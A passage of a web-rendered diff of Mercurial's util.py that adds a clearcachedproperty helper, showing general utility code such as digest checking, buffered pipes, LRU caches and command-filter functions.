##// END OF EJS Templates
util: add util.clearcachedproperty...
Mark Thomas -
r35021:be6aa0cf default
parent child Browse files
Show More
@@ -1,3861 +1,3866 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56
56
# Accessors for the C extension modules (or their pure-Python fallbacks),
# selected by the module policy.
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

# Python 2/3 compatibility names, re-exported for the rest of Mercurial.
cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
82
82
def isatty(fp):
    """Report whether fp is attached to a terminal.

    Duck-typed: any object without a working isatty() method is treated
    as a non-tty rather than raising.
    """
    try:
        return fp.isatty()
    except AttributeError:
        return False
88
88
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

# Select the platform-specific implementation module; the 'platform.*'
# aliases below resolve against whichever module is imported here.
if pycompat.iswindows:
    from . import windows as platform
    # wrap stdout to work around Windows console quirks
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform
100
100
_ = i18n._

# Re-export the platform-specific implementations under stable names so the
# rest of the codebase can write 'util.foo' without caring about the OS.
bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
# prefer the C implementation when the extension provides it
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

# These helpers only exist when the C osutil extension provides them;
# callers are expected to probe with safehasattr().
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
166
166
# Python compatibility

# Sentinel used to distinguish "attribute absent" from attributes whose
# value is None/False (see safehasattr below).
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
# NOTE(review): os.stat_float_times was removed in Python 3.7 -- this call
# assumes an older interpreter; confirm the supported Python range.
os.stat_float_times(False)
175
175
def safehasattr(thing, attr):
    """Return True if thing has the named attribute.

    Uses a private sentinel default so a single getattr() lookup suffices
    and attributes whose value is falsy are still reported as present.
    """
    return getattr(thing, attr, _notset) is not _notset
178
178
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt for input via fin/fout and return the result as local bytes.

    Temporarily swaps sys.stdin/sys.stdout for encoding-wrapped versions of
    the given streams so rawinput() reads/writes through them, and always
    restores the originals, even if rawinput() raises.
    """
    sin, sout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = sin, sout
186
186
def bitsfrom(container):
    """Return the bitwise OR of all (integer) elements of container.

    An empty container yields 0.
    """
    mask = 0
    for flag in container:
        mask |= flag
    return mask
192
192
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
207
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a native Python deprecation warning for msg.

    This is a noop outside of tests (i.e. unless HGEMITWARNINGS set
    _dowarn); use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    # +1 so the warning points at our caller, not at this helper
    warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
217
# Registry of supported digest algorithms, keyed by name.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# Sanity-check that every preference entry is in the registry.
# NOTE(review): this loop leaks 'k' at module scope.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
228
228
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        # digests: iterable of digest names (must be keys of DIGESTS)
        # s: optional initial data to feed into every digest
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed data into every configured digest."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest for the named algorithm."""
        if key not in DIGESTS:
            # Fix: the error previously formatted the stray module-level
            # name 'k' instead of the requested key, reporting the wrong
            # digest name.
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
275
275
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size                 # expected total byte count
        self._got = 0                     # bytes read through this wrapper so far
        self._digests = dict(digests)     # name -> expected hex digest
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        # Everything read is fed through the digester so validate() can
        # compare the accumulated digests afterwards.
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        # Call after the full content was read; raises Abort on any
        # size or digest mismatch.
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (k, v, self._digester[k]))
307
307
# Python 2 has a builtin buffer(); on Python 3 emulate it with a zero-copy
# memoryview slice.
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        """Return a zero-copy view of sliceable[offset:offset + length]."""
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
315
315
# Whether child processes spawned via subprocess should close inherited
# file descriptors (only enabled on POSIX).
closefds = pycompat.isposix

# Read size used by bufferedinputpipe._fillbuffer below.
_chunksize = 4096
319
319
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        self._buffer = []      # buffered chunks, oldest first
        self._eof = False      # set once os.read() returns no data
        self._lenbuf = 0       # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # Fill the buffer until we hold 'size' bytes or hit EOF, then hand
        # out at most 'size' bytes from the front.
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline in the most recent chunk, -1 if none
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks into one so slicing below is simple
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # read on the raw fd so buffering stays entirely under our control
        # (see class docstring)
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
413
413
def mmapread(fp):
    """Return a read-only mmap covering the whole of fp.

    fp may be a file object or a raw file descriptor.  Empty files cannot
    be mmapped, so an empty buffer is returned for them instead.
    """
    getfd = getattr(fp, 'fileno', None)
    fd = fp if getfd is None else getfd()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # mmap rejects zero-length mappings; degrade to an empty buffer so
        # callers can treat empty files uniformly.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
424
424
def popen2(cmd, env=None, newlines=False):
    """Spawn cmd through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout
435
435
def popen3(cmd, env=None, newlines=False):
    """Like popen4, but discard the Popen object from the return value."""
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr
439
439
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn cmd through the shell.

    Returns the child's (stdin, stdout, stderr) pipes and the Popen object.
    """
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p
448
448
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # __version__ is generated at build time; absent in a raw checkout
        return 'unknown'
    return __version__.version
456
456
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" part after the first '+' or '-'.
    # Fix: use a raw string for the pattern; '[\+-]' contained the invalid
    # escape sequence '\+' (deprecated, a syntax error in future Pythons).
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
525
525
# used by parsedate
defaultdateformats = (
    # ISO8601-ish forms, strictest first
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    # without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    # without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    # date-only forms
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    # verbose forms with weekday/month names
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    # time-only forms
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
    )
560
560
# formats additionally accepted where a looser date spec is allowed (for
# example date ranges); too ambiguous for general parsing
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
    )
567
567
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        # nullary callable: memoize the single result in a one-slot list
        slot = []
        def f():
            if not slot:
                slot.append(func())
            return slot[0]
        return f
    memo = {}
    if func.__code__.co_argcount == 1:
        # single-argument fast path: key directly on the argument so we
        # never pack/unpack an args tuple
        def f(arg):
            try:
                return memo[arg]
            except KeyError:
                memo[arg] = func(arg)
                return memo[arg]
    else:
        def f(*args):
            try:
                return memo[args]
            except KeyError:
                memo[args] = func(*args)
                return memo[args]

    return f
593
593
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if not pending:
            # nobody else holds a shared reference; safe to write in place
            return self
        # another holder exists: leave this object to them and hand the
        # caller a fresh copy to mutate
        self._copied = pending - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
611
611
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    Keys are kept in *last-set* order: re-assigning an existing key moves
    it to the end.

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # delete first so a re-set key is appended at the end instead of
        # keeping its old position
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0, so reimplement
        # update() in terms of our __setitem__ to preserve ordering
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
636
636
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    All copy-on-write machinery is inherited from ``cow``; ``dict``
    supplies the storage.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
662
662
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
668
668
class transactional(object):
    """Base class for making a transactional type into a context manager.

    Subclasses implement close() and release(); the context manager
    protocol then maps a clean exit to close() + release(), and an
    exceptional exit to release() alone (aborting the transaction).
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            # always release, even if close() itself raised
            self.release()
693
693
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is a graceful stop, not a failure: keep the
        # work done so far by closing the transaction, then re-raise
        tr.close()
        raise
    finally:
        tr.release()
711
711
@contextlib.contextmanager
def nullcontextmanager():
    # a no-op context manager, handy as a default when a caller may or may
    # not have a real context to enter
    yield
715
715
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # __slots__ keeps per-node memory small; caches can hold many nodes
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # the module-level _notset sentinel marks an unused/emptied node
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
734
734
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # key -> _lrucachenode; the linked list holds the recency order
        self._cache = {}

        # start with a single self-linked sentinel node; capacity is grown
        # lazily by _addcapacity() up to ``max`` nodes
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # a read counts as a use: freshen the node
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # NB: unlike __getitem__, get() does NOT freshen the entry
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # keep the allocated nodes (capacity) but empty them all
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
893
893
def lrucachefunc(func):
    '''cache most recent results of function calls

    Keeps roughly the 20 most recently used results; least recently used
    entries are evicted first.
    '''
    cache = {}
    order = collections.deque()
    maxsize = 20
    if func.__code__.co_argcount == 1:
        # single-argument fast path: key directly on the argument
        def f(arg):
            if arg in cache:
                # freshen: drop the old position, re-append below
                order.remove(arg)
            else:
                if len(cache) > maxsize:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > maxsize:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
920
920
class propertycache(object):
    """Decorator turning a method into a lazily computed, cached attribute.

    The first access computes the value and stores it in the instance
    __dict__ under the method's name; being a non-data descriptor, later
    lookups then hit the instance attribute and skip the descriptor.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
933
933
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # propertycache stashes the computed value in the instance __dict__;
    # dropping it forces recomputation on the next attribute access
    obj.__dict__.pop(prop, None)
938
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # closefds is a platform-specific module-level flag; stderr is left
    # attached to the parent's so filter errors remain visible
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout
940
945
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        # only the name is needed; the command opens the file itself
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # on OpenVMS an odd status means success
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temp files; either may not exist if
        # we failed early
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
974
979
# maps a filter-spec prefix to its implementation; consulted by filter()
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
979
984
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # NOTE: shadows the 'filter' builtin; kept as-is since it is public API.
    # cmd may start with a scheme ('tempfile:' or 'pipe:') selecting the
    # filtering strategy; the default is a pipe.
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
986
991
def binary(s):
    """return true if a string is binary data"""
    # heuristic: any NUL byte marks the content as binary; empty or falsy
    # input is never binary
    return bool(s) and '\0' in s
990
995
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def _floorlog2(x):
        # position of the highest set bit; 0 when x is 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1 if bits else 0

    pending = []
    size = 0
    for piece in source:
        pending.append(piece)
        size += len(piece)
        if size < min:
            continue
        if min < max:
            # double the threshold, but jump straight past the size we
            # actually accumulated, and never beyond max
            doubled = min << 1
            rounded = 1 << _floorlog2(size)
            min = doubled if doubled >= rounded else rounded
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        size = 0
    if pending:
        yield ''.join(pending)
1021
1026
# re-exported for convenience: callers historically raise util.Abort
Abort = error.Abort
1023
1028
def always(fn):
    """match-predicate helper: accept every input"""
    return True
1026
1031
def never(fn):
    """match-predicate helper: reject every input"""
